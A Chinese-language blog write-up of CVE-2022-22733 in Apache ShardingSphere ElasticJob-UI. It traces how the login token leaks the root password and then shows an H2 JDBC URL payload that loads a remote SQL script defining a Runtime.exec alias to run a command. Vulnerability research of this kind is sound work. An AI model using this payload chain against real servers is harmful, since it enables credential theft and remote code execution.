CVE-2022-22733 Apache ShardingSphere ElasticJob-UI RCE

注意
本文最后更新于 2022-01-21,文中内容可能已过时。

分析

看diff https://github.com/apache/shardingsphere-elasticjob-ui/commit/f3afe51221cd2382e59afc4b9544c6c8a4448a99

https://y4er.com/img/uploads/CVE-2022-22733-Apache-ShardingSphere-ElasticJob-UI-RCE/1.png

getToken函数会将this对象转json返回,而this对象中存储了root的密码

https://y4er.com/img/uploads/CVE-2022-22733-Apache-ShardingSphere-ElasticJob-UI-RCE/2.png

分析调用关系

https://y4er.com/img/uploads/CVE-2022-22733-Apache-ShardingSphere-ElasticJob-UI-RCE/3.png

handleLogin函数处理登录时会进行判断,如果authenticationResult.isSuccess()登录成功会返回getToken()

而handleLogin在 org.apache.shardingsphere.elasticjob.lite.ui.security.AuthenticationFilter#doFilter 使用,用来判断如果是登录的url则进行处理。

复现

https://y4er.com/img/uploads/CVE-2022-22733-Apache-ShardingSphere-ElasticJob-UI-RCE/4.png

accessToken字段解码就有root的密码了。

拿shell

默认有h2和pgsql

Make JDBC Attack Brilliant Again!

https://y4er.com/img/uploads/CVE-2022-22733-Apache-ShardingSphere-ElasticJob-UI-RCE/5.png

1
2
3
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql'
-- poc.sql内容如下
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。